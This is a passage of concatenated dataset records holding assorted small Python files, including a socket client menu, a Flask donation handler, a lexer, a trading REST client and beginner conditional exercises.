n\n return total_sum\n\n\ndef req_factorial(n):\n multi = 1\n if n <= 1:\n multi = 1\n elif n > 1:\n multi = n * req_factorial(n - 1)\n return multi\n\n\ndef loop_factorial(n):\n multi = 1\n for m in range(n):\n multi = multi * (m + 1)\n return multi\n\n\ntimeit.timeit(setup='gc.disable(); from __main__ import req_sum',\n stmt='req_sum([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20])', number=1)\ntimeit.timeit(setup='gc.disable(); from __main__ import loop_sum',\n stmt='loop_sum([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20])', number=1)\ntimeit.timeit(setup='gc.disable(); from __main__ import req_factorial',\n stmt='req_factorial(100)', number=1)\ntimeit.timeit(setup='gc.disable(); from __main__ import loop_factorial',\n stmt='loop_factorial(100)', number=1)\n","sub_path":"interactivepy/recursive_fn_vs_loop_fn.py","file_name":"recursive_fn_vs_loop_fn.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"551756964","text":"###############################################################################\n# Copyright (c) Ray Mansour Salem Investments Inc. (RMS Investments )\n#\n# All rights are reserved. Reproduction in whole or in parts is\n# prohibited without the written consent of the copyright owner.\n###############################################################################\nimport pandas as pd\nimport datetime\nfrom numpy import *\nfrom scipy import *\nfrom matplotlib.pyplot import *\n\n# stored as a panel, use unstack to convert to date frame(TBD)\ndfStock = pd.read_hdf(\"stock.google.h5\",\"stock\")\nfor symb in dfStock[\"Close\"].columns:\n\tprint (\"%s:%f\" %(symb,dfStock[\"Close\"][symb][-1]))\n\n#stored as multi-dimensional data frame\ndfGdp = pd.read_hdf(\"gdp.wb.h5\",\"gdp\")\nctry = dfGdp.columns.levels[1] \nind = dfGdp.columns.levels[0][0]\nfor c in ctry:\n\tprint(\"%s:%f\"%(c,dfGdp[ind][c][-1]) )\n\t\ndfIndex = pd.read_hdf(\"index.fred.h5\",\"index\")\nfor idx in dfIndex.columns:\n\tprint(\"%s:%f\" % (idx,dfIndex[idx][-1]) )\n\t\ndfRE = pd.read_hdf(\"real_estate.fred.h5\",\"real_estate\")\ndf = dfRE.interpolate()\nfor idx in df.columns:\n\tprint(\"%s:%f\" % (idx,df[idx][-1]) )\n\n\n\nfigure()\nax1 = subplot('111')\nax2 =ax1.twinx()\n\nax1.plot(dfStock[\"Close\"][\"spy\"],'b')\nax2.plot(dfIndex[\"VIXCLS\"],'k')\nshow()\n\ndfIndex.corrwith(dfStock[\"Close\"][\"aapl\"])","sub_path":"sandbox/process_econ_data_example.py","file_name":"process_econ_data_example.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"496772021","text":"import unittest\nimport solution\n\nTEST_CASE = '''>>><<><>><<<>><>>><<<>>><<<><<<>><>><<>>\n'''\n\n\nclass TestBasic(unittest.TestCase):\n\n def test_get_initial_coords(self):\n self.assertEqual([(2, 3), (3, 3), (4, 3), (5, 3)], solution.get_initial_coords(\n 0, [(0, 0), (1, 0), (2, 0), (3, 0)]))\n\n def test_basic_part1(self):\n data = TEST_CASE.strip()\n self.assertEqual(3068, solution.part1(data, 2022))\n\n def test_part1(self):\n with open(\"input.txt\") as f:\n data = f.read().strip()\n answer = solution.part1(data)\n self.assertEqual(3130, answer)\n\n def test_basic_part2(self):\n data = TEST_CASE.strip()\n self.assertEqual(1514285714288, solution.part2(data))\n\n def test_part2(self):\n with open(\"input.txt\") as f:\n data = f.read().strip()\n answer = solution.part2(data)\n self.assertEqual(883, answer)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"2022-python/day17/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"462733074","text":"import socket\nimport sys\nimport csv\n#main calls functions\ndef main():\n#creates socket and sets port\n global c \n c = socket.socket()\n global host \n host = socket.gethostname()\n global port\n port = 5555\n connSer()\ndef connSer():\n#connects to server and runs the auth\n c.connect((host,port))\n userauth()\n\ndef userauth():\n test = \"Welcome, you may now processed to the rest of the software\"\n user = input (\"Welcome,please enter in your username\\n\")\n userpass = input (\"and now your password\\n\")\n #encodes and recv the data\n print(\"sending data to the server\\n\")\n c.send(user.encode('utf-8'))\n c.send(userpass.encode('utf-8'))\n userlogindataback = c.recv(1024).decode('utf-8')\n print(userlogindataback)\n if userlogindataback == test:\n mainprogram()\n else:\n checklogintimes()\n\ndef checklogintimes():\n count = 0\n while (count <= 3):\n count=+ 1\n print(\"Login Attempt:\" + (str(count)))\n userauth()\n else:\n print(\"to many login attempts, the program is going to close now\")\n quit()\n\ndef mainprogram():\n userselected1 = \"You have selected option 1\\n\"\n userselected2 = \"You have selected option 2\\n\"\n userselected3 = \"You have selected option 3\\n\"\n userselected4 = \"You have selected option 4\\n\"\n userselected5 = \"You have selected option 5\\n\"\n userselected6 = \"You have selected option 6\\n\"\n selected = input(\"1.Find IP and Name \\n 2.Get Statistics \\n 3.Sort Data \\n 4.Add Org \\n 5.Remove Org \\n 6. Quit \\n\")\n c.send(selected.encode('utf-8'))\n userselectionback = c.recv(1024).decode('utf-8')\n print(userselectionback)\n if userselectionback == userselected1:\n Option1()\n elif userselectionback == userselected2:\n Option2()\n elif userselectionback == userselected3:\n Option3()\n elif userselectionback == userselected4:\n Option4()\n elif userselectionback == userselected5:\n Option5()\n elif userselectionback == userselected6:\n Option6()\n else:\n print(\"The Selection That You Have Made is Not Valid,Please Try Again\")\n mainprogram() \ndef Option1():\n serversearch = input(\"Enter The Name Of Server Lowercase Please\\n\")\n c.send(serversearch.encode('utf-8'))\n serversearchreturn = c.recv(1024).decode('utf-8')\n print(\"the server ip is:\"+serversearchreturn)\n \n\n\ndef Option2():\n print(\"Two\") \n \ndef Option3():\n sortoption = input(\"Would you like to Sort by Name or Minutes?\")\n sortorder = input(\"Would you like to Sort in Ascending or Descending Order\")\n c.send(sortoption.encode('utf-8'))\n c.send(sortorder.encode('utf-8'))\n sortdatareturn = c.recv(1024).decode('utf-8')\n print(sortdatareturn)\n\n\ndef Option4():\n newname = input(\"Enter In A New Org Name \\n\")\n c.send(newname.encode('utf-8'))\n newdomain = input(\"Enter In A New Domain Name\\n\")\n c.send(newdomain.encode('utf-8'))\n newip = input(\"Enter In A New Ip Address\\n\")\n c.send(newip.encode('utf-8'))\n newmins = input(\"Enter In A Number Of Minutes\\n\")\n c.send(newmins.encode('utf-8'))\n addneworgreturn = c.recv(1024).decode('utf-8')\n print(addneworgreturn)\n\n\n\ndef Option5():\n rmorgname = input(\"Enter an Organisation name to remove \\n\")\n c.send(rmorgname.encode('utf-8'))\n remove_confirm = c.recv(1024).decode('utf-8')\n print(remove_confirm)\n\n\ndef Option6(): \n print(\"The Software Will Now Close, Goodbye\")\n quit()\n \n\nmain()\n","sub_path":"Intro Programming/Python/Network Tool/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"250032993","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\nimport uuid\n\nfrom google.appengine.api import modules\nfrom google.appengine.api import taskqueue\n\nfrom app.util.helpers import json_encode, to_ms\n\n\ndef _get_target():\n version_name = modules.get_current_version_name()\n if version_name in ('prod', 'm', 'api', 'batchops', 'mapreducer'):\n return 'batchops'\n return version_name\n\n\nclass TaskBuilder(object):\n @staticmethod\n def _new_task(url, **kwargs):\n kwargs.setdefault('target', _get_target())\n return taskqueue.Task(\n name=kwargs.get('name', uuid.uuid4().hex),\n url=url,\n **kwargs\n )\n\n @classmethod\n def log_params(cls, **kwargs):\n return cls._new_task(\n '/_tasks/util/log_params',\n params=kwargs,\n )\n\n @classmethod\n def log_trace(cls, data, **kwargs):\n kwargs.setdefault('trace_data', data if isinstance(data, basestring) else\n json.dumps(data))\n return cls._new_task(\n '/_tasks/util/log_trace',\n params=kwargs,\n )","sub_path":"src/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"227142587","text":"import peeweedbevolve\nfrom flask import Blueprint, render_template, flash, request, redirect, url_for, Flask, session, escape\nfrom models.base_model import BaseModel\nfrom models.image import Image\nfrom models.donation import Donation\nfrom flask_login import login_required, current_user\nfrom instagram_web.util.braintree import gateway\n\n\ndonations_blueprint = Blueprint(\n 'donations', __name__, template_folder='templates')\n\n\n@donations_blueprint.route('//new', methods=['GET'])\n@login_required\ndef new(image_id):\n image = Image.get_or_none(Image.id == image_id)\n\n if not image:\n flash('image not found', 'warning')\n return redirect(url_for('home'))\n\n client_token = gateway.client_token.generate()\n\n if not client_token:\n flash('Unable to obtain client token', 'warning')\n return redirect(url_for('home'))\n\n return render_template('donations/new.html', image=image, client_token=client_token,)\n\n\n@donations_blueprint.route('//', methods=['POST'])\n@login_required\ndef create(image_id):\n nonce = request.form.get('payment_method_nonce')\n\n if not nonce:\n flash('credit card details are invalid', 'warning')\n return redirect(url_for('home'))\n\n image = Image.get_or_none(Image.id == image_id)\n\n if not image:\n flash('image not found', 'warning')\n return redirect(url_for('home'))\n\n amount = request.form.get('amount')\n\n if not amount:\n flash('please provide an amount to donate')\n return redirect(url_for('home'))\n\n result = gateway.transaction.sale({\n \"amount\": amount,\n \"payment_method_nonce\": nonce,\n \"options\": {\n \"submit_for_settlement\": True\n }\n })\n\n if not result.is_success:\n flash('unable to complete donation', 'warning')\n return redirect(request.referrer)\n\n donation = Donation(amount=amount, image_id=image.id,\n user_id=current_user.id)\n\n if not donation.save():\n flash('Donation successfull but could not create record', 'warning')\n return redirect(url_for('home'))\n\n flash('Successfully donated RM{amount}', 'success')\n return redirect(url_for('home'))\n","sub_path":"instagram_web/blueprints/donations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"402926160","text":"__author__ = 'Rushil'\r\n\r\n#3 3 9 9 5\r\n\r\nfrom collections import defaultdict\r\nfrom threading import Thread\r\n\r\nn_t = int(input().strip())\r\nm_list = []\r\n\r\nm_dict = defaultdict(list)\r\n\r\nfor _ in range(n_t):\r\n (n,m) = tuple(map(int , input().strip().split(' ')))\r\n m_dict[m] = list(map(int,input().strip().split()))\r\n\r\ndef subsets(m_list,m):\r\n\r\n s = 0\r\n\r\n for i in range(len(m_list)):\r\n for j in range(i):\r\n temp_s = sum(m_list[j:i]) % m\r\n\r\n if temp_s > s:\r\n s = temp_s\r\n\r\n print(s)\r\n\r\ndef bitch():\r\n print('Hello')\r\n\r\nfor i,j in m_dict.items():\r\n Thread(target = subsets , args=(j,i,)).start()","sub_path":"hackerank_maximizesum.py","file_name":"hackerank_maximizesum.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"362969009","text":"\ndef find_ladders(begin_word, end_word):\n q = Queue()\n visited = set()\n\n q.enqueue([begin_word])\n while q.size() > 0:\n path = q.dequeue()\n v = path[-1]\n\n if v not in visited:\n visited.add(v)\n if v == end_word:\n return path\n \n for neighbor in get_neighbors(v):\n path_copy = list(path)\n path_copy.append(neighbor)\n q.enqueue\n\n\n","sub_path":"projects/word_latters.py","file_name":"word_latters.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"239634365","text":"# считывает граф из файла\n# возвращает пару (V, E)\ndef read_col_file(filename):\n with open(filename, 'r') as file:\n vertices, edges = set(), set()\n for line in file:\n line = line.strip()\n if line.startswith('p'):\n vertices = set(range(1, int(line.split()[-2]) + 1))\n elif line.startswith('e'):\n edges.add(tuple(map(int, line.split()[-2:])))\n return (vertices, edges)\n\n\nimport random\n\n\n# Получает граф в формате G=(V, E)\n# Находит локально минимальное разбиение графа\ndef basic_local_search(graph):\n vertexes = set(graph[0])\n edges = graph[1]\n n = len(vertexes)\n\n # считает число рёбер, проходящих через разрез\n def f(part0):\n value = 0\n for edge in edges:\n # если ребро соединяет разные доли\n if (edge[0] in part0) != (edge[1] in part0):\n value += 1\n return value\n\n # получает окрестность разибения\n def neighbours_of(part0):\n neighbours = []\n\n part1 = vertexes - part0\n # выбираем, какие вершины обменять\n for v0 in part0:\n for v1 in part1:\n part = set(part0)\n part.remove(v0)\n part.add(v1)\n neighbours += [part]\n return neighbours\n\n # находит лучшее разбиение в окрестности\n def get_best_in_neighbours(part0):\n best_in_neighbours = part0\n best_f = f(part0)\n for new_part0 in neighbours_of(part0):\n if f(new_part0) < best_f:\n best_in_neighbours = new_part0\n best_f = f(new_part0)\n return best_in_neighbours\n\n # выбираем случайное разбиение\n vertexes_shuffle = list(vertexes)\n random.shuffle(vertexes_shuffle)\n part0 = set(vertexes_shuffle[:n // 2])\n\n # выбираем лучшее разбиение в окрестности (пока такое есть)\n while True:\n best_in_neighbours = get_best_in_neighbours(part0)\n if best_in_neighbours == part0:\n return part0\n part0 = best_in_neighbours\n\n\nfor i in range(3, 8):\n filename = 'myciel{}.col'.format(i)\n graph = read_col_file(filename)\n part = basic_local_search(graph)\n print('Файл {}: разбиение {}'.format(filename, part))\n","sub_path":"2-1/2-1.py","file_name":"2-1.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"379020282","text":"\"\"\"\nMake request to restful API of Xing bridge server\n\"\"\"\nimport os\nimport pandas as pd\nimport requests\n\n\nclass KiwoomRestAPI:\n def __init__(self, server_url):\n self.server_url = server_url # e.g., http://192.168.0.33:5000\n self.price_url = os.path.join(server_url, \"price\") # e.g., http://192.168.0.33:5000/price\n self.order_url = os.path.join(server_url, \"order\")\n self.balance_url = os.path.join(server_url, \"balance\")\n\n def get_price(self, code):\n \"\"\"\n code: symbol, in string. e.g., \"233740\".\n \"\"\"\n data = {\n \"code\": shcode\n }\n resp = requests.post(self.price_url, json=data)\n #print(\"get_price:\", shcode)\n #print(resp.status_code)\n #print(resp.json())\n return resp.json()\n\n def market_order(self, accno, code, qty, premarket=False):\n \"\"\"\n accno: string of account number to run transaction on.\n code: (str) Symbol for buying the stock.\n qty: quantity. If below 0, it is a sell order.\n \"\"\"\n if qty == 0:\n return # Nothing to do.\n\n ty = \"premarket\" if premarket else \"market\"\n data = {\n \"qty\": qty,\n \"price\": 0,\n \"code\": code,\n \"type\": ty,\n \"accno\": accno,\n }\n requests.post(self.order_url, json=data)\n\n def limit_order(self, accno, code, qty, price):\n \"\"\"\n accno: string of account number to run transaction on.\n code: (str) Symbol for buying the stock.\n qty: quantity. If below 0, it is a sell order.\n price: price of the limit order\n \"\"\"\n if qty == 0:\n return # Nothing to do.\n\n data = {\n \"qty\": qty,\n \"price\": price,\n \"code\": code,\n \"type\": \"limit\",\n \"accno\": accno,\n }\n requests.post(self.order_url, json=data)\n\n def balance(self, accno):\n \"\"\"\n accno: string of account number to run transaction on.\n Returns: a dict containing item and quantity. For example,\n\n result = {\n \"cash\": 1000000,\n \"233740\": 1\n }\n \"\"\"\n data = {\n \"accno\": accno\n }\n resp = requests.post(self.balance_url, json=data)\n result = resp.json()\n\n # You get '0' as count for things you sold. Remove them.\n to_del = []\n for key, val in result.items():\n if val == 0:\n to_del.append(key)\n for key in to_del:\n del result[key]\n return result\n\n\nif __name__ == \"__main__\":\n import json\n with open(os.path.expanduser(\"~/.kiwoom.json\")) as f:\n args = json.load(f)\n server_url = args[\"server_url\"]\n account_num = args[\"account_num\"]\n\n ex = KiwoomRestAPI(server_url)\n #ex.market_order(account_num, \"233740\", 10)\n #ex.limit_order(account_num, \"233740\", -5, 13000)\n balance = ex.balance(account_num)\n print(balance)\n","sub_path":"quantylab/systrader/kiwoom/bridge_tornado/kiwoom_restful_client.py","file_name":"kiwoom_restful_client.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386625340","text":"\"\"\"\nTen plik zdobywa randomową klatkę z filmow Idiot Duo i zapisuje ja do pliku 'klatka.jpg'\n\"\"\"\ndef zapisz_klatke():\n import os\n import random\n import youtube_dl\n from ffmpy import FFmpeg\n\n from bot.ids import ids\n\n wybranyFilm = random.choice(ids)\n\n ydl_opts = {\n 'format': '(bestvideo/best)[protocol!=http_dash_segments]'\n }\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n info_dict = ydl.extract_info(wybranyFilm, download=False)\n urlPliku = info_dict.get('url')\n dlugosc = info_dict.get('duration')\n\n losowyCzas = random.uniform(0, dlugosc)\n\n print(f'Calkowita dlugosc = {dlugosc}\\nWybrana dlugosc = {losowyCzas}')\n\n assert 0 <= losowyCzas <= dlugosc, 'Randomowo wybrany losowyCzas nie zawiera sie w przedziale <0;dlugosc>'\n\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'\n inputs = f'-y -user_agent \"{user_agent}\"'\n\n from bot.config import FFMPEG_PATH\n from bot.on_remote import on_remote\n ff = FFmpeg(\n # jesli istnieje environment path do ffmpeg (circleCI[nie zaimplementowano], heroku) to uzyj defaultowej wartosci 'ffmpeg'\n # inaczej dobierz ze .exe ze statica\n executable = FFMPEG_PATH if not on_remote else 'ffmpeg',\n inputs={urlPliku: inputs},\n outputs={os.path.join(os.getcwd(),\"output\", \"klatka.jpg\"): f'-ss {losowyCzas:.2f} -frames:v 1 -q:v 2'})\n\n print(ff.cmd)\n ff.run()\n\nif __name__ == '__main__':\n zapisz_klatke()","sub_path":"bot/randomowa_klatka.py","file_name":"randomowa_klatka.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"398914053","text":"import collections\nimport enum\nimport re\n\n\nToken = collections.namedtuple('Token', ['type', 'value', 'lineno', 'colno'])\n\n\nclass LexError(Exception):\n def __init__(self, value, lineno, colno):\n self.value = value\n self.lineno = lineno\n self.colno = colno\n\n def __str__(self):\n return 'unexpected {}'.format(self.value)\n\n\ndef _make_lexer(rules, eof_type):\n rule_types = [type for type, _ in rules]\n regexp_str = '|'.join('({})'.format(expr) for name, expr in rules) + '|.'\n regexp = re.compile(regexp_str, re.MULTILINE)\n\n def lex(s):\n lineno = 1\n colno = 1\n\n for match in regexp.finditer(s):\n for i, type in enumerate(rule_types):\n m = match.group(i + 1)\n\n if m is not None:\n yield Token(type, m, lineno, colno)\n for c in m:\n if c == '\\n':\n lineno += 1\n colno = 1\n else:\n colno += 1\n break\n else:\n raise LexError(match.group(0), lineno, colno)\n\n yield Token(eof_type, '', lineno, colno)\n\n return lex\n \n\nType = enum.Enum('Type', [\n 'EOF',\n 'COMMENT',\n 'WS',\n 'LBRACE',\n 'RBRACE',\n 'DOT',\n 'COLON',\n 'SEMICOLON',\n 'EQUALS',\n 'LPAREN',\n 'RPAREN',\n 'ENUM',\n 'RECORD',\n 'ALIAS',\n 'IMPORT',\n 'STRING',\n 'SYMBOL',\n 'NUMBER',\n])\n\nSKIPPED_TOKENS = {Type.COMMENT, Type.WS}\n\nlex = _make_lexer([\n (Type.COMMENT, r'#.+\\n'),\n (Type.WS, r'[ \\n\\r]+'),\n (Type.LBRACE, r'\\{'),\n (Type.RBRACE, r'\\}'),\n (Type.DOT, r'\\.'),\n (Type.COLON, r':'),\n (Type.EQUALS, r'='),\n (Type.SEMICOLON, r';'),\n (Type.LPAREN, r'\\('),\n (Type.RPAREN, r'\\)'),\n (Type.RECORD, r'record'),\n (Type.ENUM, r'enum'),\n (Type.ALIAS, r'alias'),\n (Type.IMPORT, r'import'),\n (Type.STRING, r\"'(?:[^\\\\']|\\\\.)*'\" + '|' + r'\"(?:[^\\\\\"]|\\\\.)*\"'),\n (Type.SYMBOL, r'[a-zA-Z_][a-zA-Z0-9_]*'),\n (Type.NUMBER, r'[0-9]+'),\n], Type.EOF)\n\n\ndef lex_cleaned(s):\n return (token for token in lex(s) if token.type not in SKIPPED_TOKENS)\n","sub_path":"admiral/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"205725391","text":"def countOccurences(num, y):\n # 25 %10 = 2\n # 25/=10 = 5\n sum = 0\n while num >= 0:\n if num == 0 and y == 0:\n sum += 1\n break\n\n if num == 0 and y != 0:\n break\n\n digit = num % 10\n if digit == y:\n sum += 1\n\n num //= 10\n\n return sum\n\n\ndef num_occurences(r, y):\n sum = 0;\n for i in range(r + 1):\n sum += countOccurences(i, y)\n return sum\n\n\nprint(str(num_occurences(25, 2)))\n","sub_path":"src/play/find_number_occurences.py","file_name":"find_number_occurences.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"139100398","text":"import logging.handlers\n\n\nclass GetLog():\n\n logger = None\n # 获取日志器方法\n @classmethod\n def get_log(cls):\n\n if cls.logger is None:\n # 获取 日志器\n cls.logger = logging.getLogger()\n # 设置 总级别\n cls.logger.setLevel(logging.INFO)\n # 获取 以时间分隔文件处理,处理器\n th = logging.handlers.TimedRotatingFileHandler(filename=\"../log/hr.log\",\n when=\"midnight\",\n interval=1,\n backupCount=30,\n encoding=\"utf-8\")\n # 设置 处理器级别\n th.setLevel(logging.INFO)\n # 获取 以时间分隔文件处理,处理器\n th_err = logging.handlers.TimedRotatingFileHandler(filename=\"../log/err.log\",\n when=\"midnight\",\n interval=1,\n backupCount=30,\n encoding=\"utf-8\")\n # 设置 处理器级别\n th_err.setLevel(logging.ERROR)\n # 获取格式器\n fmt = \"%(asctime)s %(levelname)s [%(name)s] [%(filename)s (%(funcName)s:%(lineno)d] - %(message)s\"\n fm = logging.Formatter(fmt)\n # 将格式器添加到处理器中\n th.setFormatter(fm)\n th_err.setFormatter(fm)\n # 将处理器添加到日志器中\n cls.logger.addHandler(th)\n cls.logger.addHandler(th_err)\n # 返回日志器(日志入口)\n return cls.logger\n\n\nif __name__ == '__main__':\n log = GetLog.get_log()\n log.info(\"info 级别信息测试\")\n log.error(\"error 级别信息测试\")\n log.criticly(\"criticly严重测试\")","sub_path":"tool/ge_log.py","file_name":"ge_log.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"550558118","text":"from apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nimport sys, os, django\nsys.path.append(os.path.abspath(os.path.join('..', 'gotcha')))\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gotcha.settings')\ndjango.setup()\nfrom accounts.models import Game\nfrom django.utils import timezone\nfrom time import sleep\n\nscheduler = BackgroundScheduler()\n\ndef loop_job():\n for game in Game.objects.filter(target_assignment_time__isnull=False):\n if timezone.now() > game.target_assignment_time:\n send_targets_and_codes(game.pk)\n \n for game in Game.objects.filter(start_elimination_time__isnull=False):\n if timezone.now() > game.start_elimination_time:\n start_elimination_round(game.pk)\n\n# def say_hello_job():\n# for game in Game.objects.all():\n# if Game.\n\ndef start_elimination_round(game_pk):\n if not Game.objects.filter(pk=game_pk):\n return # just in case the game doesn't exist anymore!\n\n game = Game.objects.get(pk=game_pk)\n\n \"\"\"\n Scenarios:\n 1. move the time forward: ignore older ones, by ensuring that current time (when the task is executed) exceeds the new time\n 2. move the time backward: ignore the newer ones, already ensured as the updated task is the first task after the new time (other ones will be in the wrong stage)\n \"\"\"\n if not game.start_elimination_time:\n return\n\n if timezone.now() < game.start_elimination_time: # to make sure the right one is executed\n return\n\n\n\n game.start_elimination_time = None\n game.save()\n if len(game.players().filter(secret_code__isnull=False)) < 2 or not game.in_target_sending:\n return\n\n game.in_progress = True\n game.save()\n\n for player in game.players().filter(secret_code__isnull=False):\n player.last_active = timezone.now()\n player.save()\n\ndef send_targets_and_codes(game_pk):\n if not Game.objects.filter(pk=game_pk):\n return\n \n game = Game.objects.get(pk=game_pk)\n if not game.target_assignment_time:\n return\n\n # prevent any tasks set 5 minutes past the assignment time to be executed!\n if timezone.now() < game.target_assignment_time:\n return \n\n game.target_assignment_time = None # if correct, clear it, if wrong phase, clear it too\n game.save()\n if game.in_registration:\n game.reset()\n\nscheduler.add_job(loop_job, 'interval', seconds=3)\n\nscheduler.start()\n\nwhile True:\n sleep(60)\n\n","sub_path":"accounts/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"599026852","text":"from django.shortcuts import render, redirect, HttpResponseRedirect\nfrom places.models import Place\nfrom house.models import House\nfrom tour.models import Tour, BookTour, PlaceTour\nfrom tourer.models import Tourer, Account\nfrom django.contrib import messages\n\n# Create your views here.\ndef home(request):\n places = Place.objects.all().order_by('-id')[:8]\n houses = House.objects.all().order_by('-id')[:3]\n query = \"SELECT *,(sum(a.price) * t.person) as sum_price, sum(a.price) as total_price FROM tour_placeTour a inner join tour_tour t on a.tour_id = t.id group by t.id limit 8\"\n tour = Tour.objects.raw(query)\n place_context = Place.objects.all().order_by('-price')[:4]\n\n query_total_accout = (\n \" select *,count(a.accout_id) as countTotal from tour_booktour as\"\n \" a inner join tourer_account as\"\n \" t on a.accout_id = t.id\"\n \" group by a.accout_id\"\n \" order by count(a.accout_id) desc\"\n \" limit 4\"\n )\n booktotal = BookTour.objects.raw(query_total_accout)\n\n if 'account' in request.session:\n idempresa = request.session['account']\n else:\n idempresa=None\n\n if idempresa == None:\n tour_city = Tour.objects.raw(\"SELECT city,id from tour_tour group by city\")\n context = {\n 'context':tour,\n 'idempresa':idempresa,\n 'houses':houses,\n 'tour_city':tour_city,\n 'place_context':place_context,\n 'booktotal':booktotal\n }\n return render(request,'home/home.html',context)\n else:\n account = Account.objects.get(email=idempresa)\n author_account = account.author\n if author_account == 'admin':\n query_details = \"SELECT t.*,b.*,sum(p.price) as total_price,(sum(p.price) * t.person) as sum_price FROM tour_tour t inner join tour_placetour p on t.id=p.tour_id inner join tour_booktour b on b.tour_id = t.id where b.accout_id = '\" + idempresa + \"'\" +\" group by t.id\"\n bookTour = BookTour.objects.raw(query_details)\n tour_city = Tour.objects.raw(\"SELECT city,id from tour_tour group by city\")\n context = {\n 'context':tour,\n 'idempresa':idempresa,\n 'houses':houses,\n 'bookTour':bookTour,\n 'tour_city':tour_city,\n 'admin':'admin',\n 'place_context':place_context,\n 'booktotal':booktotal\n }\n return render(request,'home/home.html',context)\n else:\n tour_city = Tour.objects.raw(\"SELECT city,id from tour_tour group by city\")\n context = {\n 'context':tour,\n 'idempresa':idempresa,\n 'houses':houses,\n 'tour_city':tour_city,\n 'place_context':place_context,\n }\n return render(request,'home/home.html',context)\n \n\ndef search_multi(request):\n if request.method == \"POST\":\n city = request.POST.get('city_tour')\n price = request.POST.get('price')\n person = request.POST.get('person')\n date = request.POST.get('date')\n return redirect('/tour/search/' + city + '/' + str(price) + '/' + str(person) + '/' + str(date) + '/')\n else:\n return render(request,'error/index.html',{\n 'error':'wrong routing path'\n })","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90811337","text":"def sampleTest():\n\thoursWorked = 39\n\tsalary = 39000\n\tpassword = \"Guest\"\n\tuPassword = raw_input('Enter password: ')\n\tif(password == uPassword):\n\t\tprint('Access Granted!')\n\telse:\n\t\tprint('Access Denied!')\n\tif(hoursWorked > 40 and salary <= 50000):\n\t\tprint('Kaboom!')\n\telse:\n\t\tprint('Not Kaboom!')\n\ndef simpleIF():\n\t# if relationaexpression: \n\t# \tstatements\n\thoursWorked = int(raw_input('Enter hours worked: '))\n\trate = 25.00\n\tif hoursWorked > 40:\n\t\tgrossPay = (40 * rate ) + ((hoursWorked - 40) * (rate * 1.5))\n\tif hoursWorked <= 40:\n\t\tgrossPay = hoursWorked * 40\n\tprint('Gross Pay: ' + str(grossPay))\n\ndef ELSE():\n\t# if relationalexpression:\n\t# statements: run if true\n\t# else: \n\t# statements: run if false\n\thoursWorked = int(raw_input('Enter hours worked: '))\n\trate = 25.00\n\tif hoursWorked > 40:\n\t\tgrossPay = (40 * rate ) + ((hoursWorked - 40) * (rate * 1.5))\n\telse:\n\t\tgrossPay = hoursWorked * 40\n\tprint('Gross Pay: ' + str(grossPay))\n\ndef ifELIF():\n\t# if relationalexpression:\t\n\t# statements: run if true\n\t# elif relationalexpression2:\n\t# statements: run if true\n\t# else: \n\t# statements: run if all else is false\n\tgrade = int(raw_input('Enter numeric grade: '))\n\tletterGrade = ''\n\tif grade >= 89:\n\t\tletterGrade = 'A'\n\telif grade >= 80:\n\t\tletterGrade = 'B'\n\telif grade >= 79:\n\t\tletterGrade = 'C'\n\telif grade >= 69:\n\t\tletterGrade = 'D'\n\telse:\n\t\tletterGrade = 'F'\n\n\tprint(str(grade) + ' Letter Grade: ' + letterGrade) \n\ndef guessingGame():\n\tanswer = \"Watson\"\n\tprint('Here is a guessing game. You get three tries!')\n\tresponse = raw_input('What is the name of the computer that played on Jeopardy? ')\n\tif answer == response:\n\t\tprint('That is right!')\n\telse:\n\t\tresponse = 